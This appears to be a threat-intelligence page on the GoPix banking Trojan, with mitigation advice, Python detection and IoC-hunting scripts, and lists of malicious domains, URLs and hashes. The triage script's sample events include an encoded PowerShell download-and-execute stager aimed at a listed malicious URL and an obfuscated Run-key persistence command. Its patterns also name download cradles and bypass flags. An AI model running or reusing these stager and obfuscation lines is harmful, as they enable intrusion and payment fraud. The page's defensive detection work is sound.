GoPix banking Trojan targeting Brazilian financial institutions
GoPix is a banking Trojan targeting Brazilian financial institutions and cryptocurrency users. Its payload is a memory-only implant staged by obfuscated PowerShell scripts, which keeps it off disk and away from file-based antivirus scanning, while persistence is handled separately through registry run keys. The malware is distributed through malvertising on Google Ads and positions itself between the victim and the bank to monitor Pix transactions and Boleto payment slips. It carries a stolen code-signing certificate and several layers of obfuscation to pass security controls. Victims are chosen deliberately, among them state government financial bodies and large corporations, and a legitimate anti-fraud service is abused to decide which visitors receive the payload. GoPix also cleans up after itself to frustrate forensic analysis. The campaign is currently confined to Brazil, but the tradecraft would work against any comparable payment infrastructure. No CVE is associated with GoPix; initial access relies on social engineering, not a software exploit. Its targeted scope and evasion techniques make it a medium severity threat that warrants focused mitigation.
AI Analysis
Technical Summary
GoPix is a targeted banking Trojan aimed primarily at Brazilian financial institutions and cryptocurrency users. It is an evolution of earlier Remote Access Trojans (RATs) and Automated Transfer System (ATS) malware: the payload is a memory-only implant that is never written to disk, so file-based antivirus scanning has nothing to inspect, and it is launched by heavily obfuscated PowerShell scripts. Initial access comes from malvertising campaigns on Google Ads that redirect victims to attacker-controlled domains. The delivery infrastructure uses a legitimate anti-fraud service to filter visitors, so the payload reaches only selected high-value targets, including state government financial bodies and large corporations.

Once running, GoPix inserts itself between the victim and the bank to intercept and monitor Pix transactions (Brazil's instant payment system) and Boleto payment slips, which lets the operator divert or manipulate payments. GoPix components are signed with a stolen code-signing certificate so that they pass signature-based controls. Persistence is established through registry run keys (MITRE ATT&CK T1547.001) and the implant is placed in a host process by process injection (T1055). Multiple obfuscation layers (T1027) protect the loader, and post-operation cleanup routines remove traces, which complicates incident response and forensics.

No CVE is associated with GoPix: it relies on social engineering for initial access rather than exploiting a software vulnerability. Observed techniques additionally include input capture (T1056.001, keylogging), PowerShell as the command and scripting interpreter (T1059.001) and command-and-control over web services (T1102). The indicators of compromise are file hashes (MD5, SHA-1 and SHA-256 values) and the domains and URLs of the delivery and C2 infrastructure listed below.
Potential Impact
GoPix exposes Brazilian financial institutions and cryptocurrency users to direct financial loss and reputational damage: an operator who sits between the victim and the bank can read and alter Pix and Boleto transactions, breaking both the integrity and the confidentiality of the payment flow and eroding trust in digital payments. Because the implant lives only in memory and is staged by obfuscated scripts, detection and remediation are harder, dwell time grows and with it the window for fraud and data exfiltration. The deliberate targeting of state government financial bodies and large corporations means a successful intrusion can disrupt critical financial operations and public services. The stolen code-signing certificate and the abuse of a legitimate anti-fraud service for victim filtering blunt controls that trust signatures or that allow traffic to reputable services. The campaign is currently confined to Brazil, but the tradecraft transfers to any payment infrastructure with comparable properties. The medium severity rating reflects a targeted, technically capable threat that demands specialised detection and response capabilities rather than a broadly spreading one.
Mitigation Recommendations
Deploy endpoint detection and response (EDR) tooling that inspects process memory and flags in-memory implants, process injection and anomalous PowerShell activity. Do not rely on the PowerShell execution policy as a control: it is not a security boundary and is bypassed with a single command-line switch. Instead, enable PowerShell script block logging (Event ID 4104) and module logging, keep AMSI integration active, run interactive sessions in Constrained Language Mode where possible, and restrict who may launch scripts at all with application control (AppLocker or WDAC). Add behavioural analytics for interception of Pix and Boleto transactions, for example unexpected changes to browser proxy settings or to the trusted root certificate store on workstations that handle payments, since these are common ways a local man-in-the-middle is set up. Treat a valid Authenticode signature as an attribute to check, not as proof of legitimacy: validate the signer against an allow list of expected publishers, check revocation status, and alert on publishers never seen before in the environment. Note that the actor's victim filtering goes through a legitimate anti-fraud service, so blocking that service is neither practical nor useful; focus instead on the PowerShell stage and the network indicators that follow it.

Segment the network so that systems that initiate or approve payments are isolated from general user endpoints, and block the listed domains and URLs at DNS and proxy level. Hunt for the indicators of compromise below; the hashes are a mix of MD5, SHA-1 and SHA-256 values and must be matched against the corresponding field in EDR and file-inventory data. Train users to recognise malvertising, in particular sponsored search results delivered through Google Ads. Enforce multi-factor authentication on financial systems to reduce the impact of stolen credentials. Keep threat intelligence feeds current to catch variants and related campaigns. Finally, prepare incident response plans that include memory forensics: GoPix's cleanup routines mean disk artefacts may be gone by the time an alert fires, so capture volatile memory before isolating or rebooting a suspect host.
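The script-level detection described above, as an added example that is not code from the original page or from the GoPix authors: a triage of PowerShell script block events that decodes -EncodedCommand payloads before scoring them, so that obfuscation hidden inside the encoding still registers. The three events, the pattern list, the weights and the threshold are constructed assumptions; the staging URL in the second event is taken from the IoC list on this page, but the command built around it is invented.

```python
"""Heuristic triage of PowerShell script block events (Event ID 4104).

Added example, not code from the original page. The events below are
constructed; the patterns, weights and threshold are assumptions.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# Matches -e / -enc / -EncodedCommand followed by a base64 blob.
ENC_RX = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# (name, regex, weight). Weights are an assumption chosen for this example.
PATTERNS = [
    ("encoded_command", ENC_RX, 4),
    ("reflective_load", re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I), 4),
    ("iex", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 3),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 3),
    ("run_key", re.compile(r"CurrentVersion\\Run", re.I), 3),
    ("download", re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I), 2),
    ("char_concat", re.compile(r"\[char\]\s*\d+", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("exec_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    ("tick_obfuscation", re.compile(r"[A-Za-z]`[A-Za-z]"), 2),
    ("string_join", re.compile(r"-join\b", re.I), 1),
]
THRESHOLD = 6  # assumption: tune against your own baseline of 4104 events


def decode_encoded_command(text: str) -> str | None:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None."""
    m = ENC_RX.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    record_id: int
    score: int
    hits: list[str] = field(default_factory=list)
    decoded: str | None = None


def triage(event: dict) -> Finding:
    """Score one event; the decoded payload is scanned alongside the raw text."""
    text = event["ScriptBlockText"]
    decoded = decode_encoded_command(text)
    corpus = text if decoded is None else f"{text}\n{decoded}"
    hits = [name for name, rx, _ in PATTERNS if rx.search(corpus)]
    score = sum(weight for name, _, weight in PATTERNS if name in hits)
    return Finding(event["RecordId"], score, hits, decoded)


def suspicious(events: list[dict]) -> list[Finding]:
    """Findings at or above THRESHOLD, in input order."""
    return [f for f in map(triage, events) if f.score >= THRESHOLD]


def encode_for_powershell(command: str) -> str:
    """Build the base64(UTF-16LE) form that powershell.exe -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample events. The staging URL is from this page's IoC list;
# the surrounding commands are invented for the example.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://4a3d.com/1/')"
SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText":
        r"Get-ChildItem -Path C:\Users -Recurse | Where-Object { $_.Length -gt 1MB }"},
    {"RecordId": 2, "ScriptBlockText":
        f"powershell.exe -NoP -NonI -W Hidden -ep bypass -enc {encode_for_powershell(STAGER)}"},
    {"RecordId": 3, "ScriptBlockText":
        r"$b = [char]73+[char]69+[char]88; i`e`x ([Text.Encoding]::UTF8.GetString("
        r"[Convert]::FromBase64String($blob))); Set-ItemProperty -Path "
        r"HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Updater -Value $dropper"},
]

if __name__ == "__main__":
    for f in suspicious(SAMPLE_EVENTS):
        print(f"record {f.record_id}: score={f.score} hits={f.hits}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Two points the sample is built to show: the third event evades the literal `iex` pattern by splitting the token with backticks, which is why a tick heuristic is scored separately, and the second event only scores highly because the base64 payload is decoded first. Event ID 4104 records script block text after PowerShell has already decoded it, so the base64 form is what you will see in process-creation telemetry (Security 4688 or Sysmon Event ID 1), and the same scoring applies there. Script block logging must be switched on before any of this exists: the policy value is EnableScriptBlockLogging under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, and events are read from the Microsoft-Windows-PowerShell/Operational log.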
Affected Countries
Brazil
Indicators of Compromise
- hash: 28c314acc587f1ea5c5666e935db716c
- hash: d3a17cb4cdba724a0021f5076b33a103
- hash: eb0b4e35a2ba442821e28d617dd2daa2
- hash: 1b1f85b68e6c9fde709d975a186185c94c0faa51
- hash: b7cfedf9346bc1a4f497396d35360c599663725d
- hash: f110d0bd7f3bd1c7b276dc78154dd21eef953384
- hash: 7ee681e494d942d7dcc399f5f81fa48cad01e41742d1882790ad4d8d115e25ca
- url: http://4a3d.com/1/
- url: http://9de1.com/1/
- url: http://b3d0.com/1/
- url: http://ef0h.com/1/
- url: http://webmensagens4bb7.com/
- url: http://yogarecap.com/1/
- url: https://correioez0ubcfht9i3.lovehomely.com/
- url: https://correiotwknx9gu315h.lovehomely.com/
- url: https://mydigitalrevival.com/get.php
- domain: 4a3d.com
- domain: 9de1.com
- domain: b3d0.com
- domain: ef0h.com
- domain: mydigitalrevival.com
- domain: paletolife.com
- domain: webmensagens4bb7.com
- domain: yogarecap.com
- domain: correioez0ubcfht9i3.lovehomely.com
- domain: correiotwknx9gu315h.lovehomely.com
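To act on the list above, an added example (not code from the original page or from the Securelist report) that normalises these indicators and hunts for them in log data. The indicator values are copied from the list; the log lines, their field names (query=, url=, sha256=), client addresses and hostnames are constructed for illustration, and the hash types are inferred from hex length because the page labels all seven values only as "hash". A URL indicator is also treated as a domain indicator for its host, and a listed subdomain deliberately does not match a query for its parent domain, since lovehomely.com itself is not on the list.

```python
"""Normalize the IoC list above and hunt for it in constructed log samples.
Added example, not code from the original page. Indicator values are copied
from this page; log lines are constructed; hash types come from hex length."""
from __future__ import annotations

import re
from collections import defaultdict, namedtuple
from urllib.parse import urlparse

RAW_IOCS = """
- hash: 28c314acc587f1ea5c5666e935db716c
- hash: d3a17cb4cdba724a0021f5076b33a103
- hash: eb0b4e35a2ba442821e28d617dd2daa2
- hash: 1b1f85b68e6c9fde709d975a186185c94c0faa51
- hash: b7cfedf9346bc1a4f497396d35360c599663725d
- hash: f110d0bd7f3bd1c7b276dc78154dd21eef953384
- hash: 7ee681e494d942d7dcc399f5f81fa48cad01e41742d1882790ad4d8d115e25ca
- url: http://4a3d.com/1/
- url: http://9de1.com/1/
- url: http://b3d0.com/1/
- url: http://ef0h.com/1/
- url: http://webmensagens4bb7.com/
- url: http://yogarecap.com/1/
- url: https://correioez0ubcfht9i3.lovehomely.com/
- url: https://correiotwknx9gu315h.lovehomely.com/
- url: https://mydigitalrevival.com/get.php
- domain: 4a3d.com
- domain: 9de1.com
- domain: b3d0.com
- domain: ef0h.com
- domain: mydigitalrevival.com
- domain: paletolife.com
- domain: webmensagens4bb7.com
- domain: yogarecap.com
- domain: correioez0ubcfht9i3.lovehomely.com
- domain: correiotwknx9gu315h.lovehomely.com
"""
HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}
HOST_KEYS = {"query", "sni", "dest_host"}  # log fields that carry a hostname
KV = re.compile(r"(\w+)=(\S+)")           # key=value tokens in the sample logs
Hit = namedtuple("Hit", "line_no ioc_type indicator evidence")


def parse_iocs(text: str) -> dict[str, set[str]]:
    """Bucket indicators into md5/sha1/sha256/url/domain sets (lower-cased)."""
    iocs: dict[str, set[str]] = defaultdict(set)
    for raw in text.splitlines():
        line = raw.strip().lstrip("-").strip()
        if ":" not in line:
            continue
        kind, value = (p.strip() for p in line.split(":", 1))
        kind = kind.lower()
        if kind == "hash":
            value = value.lower()
            if not re.fullmatch(r"[0-9a-f]+", value) or len(value) not in HASH_TYPES:
                raise ValueError(f"unrecognised hash value: {value!r}")
            iocs[HASH_TYPES[len(value)]].add(value)
        elif kind == "url":
            iocs["url"].add(value)
            host = urlparse(value).hostname
            if host:
                iocs["domain"].add(host.lower())  # a URL indicator implies its host
        elif kind == "domain":
            iocs["domain"].add(value.lower().rstrip("."))
    return iocs


def match_domain(host: str | None, domains: set[str]) -> str | None:
    """Exact or subdomain match; a listed subdomain does not match its parent."""
    if not host:
        return None
    host = host.lower().rstrip(".")
    found = [d for d in domains if host == d or host.endswith("." + d)]
    return max(found, key=len) if found else None


def hunt(log_text: str, iocs: dict[str, set[str]]) -> list[Hit]:
    """Match each key=value field of a log line against the matching IoC bucket."""
    hits: list[Hit] = []
    for n, line in enumerate(log_text.strip().splitlines(), start=1):
        for key, value in KV.findall(line):
            key = key.lower()
            if key in HASH_TYPES.values() and value.lower() in iocs.get(key, set()):
                hits.append(Hit(n, key, value.lower(), line))
            elif key == "url" and value in iocs.get("url", set()):
                hits.append(Hit(n, "url", value, line))  # exact URL match
            elif key == "url" or key in HOST_KEYS:  # otherwise fall back to the host
                host = urlparse(value).hostname if key == "url" else value
                d = match_domain(host, iocs.get("domain", set()))
                if d:
                    hits.append(Hit(n, "domain", d, line))
    return hits


# Constructed DNS, proxy and EDR file events; not real telemetry.
SAMPLE_LOGS = r"""
2026-03-16T18:01:02Z type=dns client=10.0.0.15 query=correioez0ubcfht9i3.lovehomely.com
2026-03-16T18:01:05Z type=proxy client=10.0.0.15 url=http://4a3d.com/1/ status=200
2026-03-16T18:01:09Z type=proxy client=10.0.0.15 url=https://www.yogarecap.com/landing?x=1 status=302
2026-03-16T18:02:00Z type=dns client=10.0.0.22 query=lovehomely.com
2026-03-16T18:05:41Z type=edr host=WS-0142 sha256=7EE681E494D942D7DCC399F5F81FA48CAD01E41742D1882790AD4D8D115E25CA path=C:\Users\ana\AppData\Local\Temp\setup.exe
2026-03-16T18:06:12Z type=edr host=WS-0007 md5=d41d8cd98f00b204e9800998ecf8427e path=C:\Windows\System32\notepad.exe
"""
```

Run it with `hunt(SAMPLE_LOGS, parse_iocs(RAW_IOCS))`: the first, second, third and fifth sample lines produce hits, the parent-domain query and the benign MD5 do not. In practice the same three buckets map onto different data sources: hashes against EDR file events and software inventory (matched on the field of the right algorithm), domains against DNS and TLS SNI logs, and the exact URLs against proxy logs, where the `/1/` paths are more specific than the bare domains and worth keeping as separate rules.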
Technical Details
- Author: AlienVault
- TLP: white
- References: https://securelist.com/gopix-banking-trojan/119173/
- Adversary: GoPix
- Pulse ID: 69b81e54cf83df8f4401d65d
- Threat Score: not assigned
Threat ID: 69b84bd2771bdb17491b7596
Added to database: 3/16/2026, 6:28:34 PM
Last enriched: 3/16/2026, 6:42:40 PM
Last updated: 3/16/2026, 10:36:18 PM
Views: 10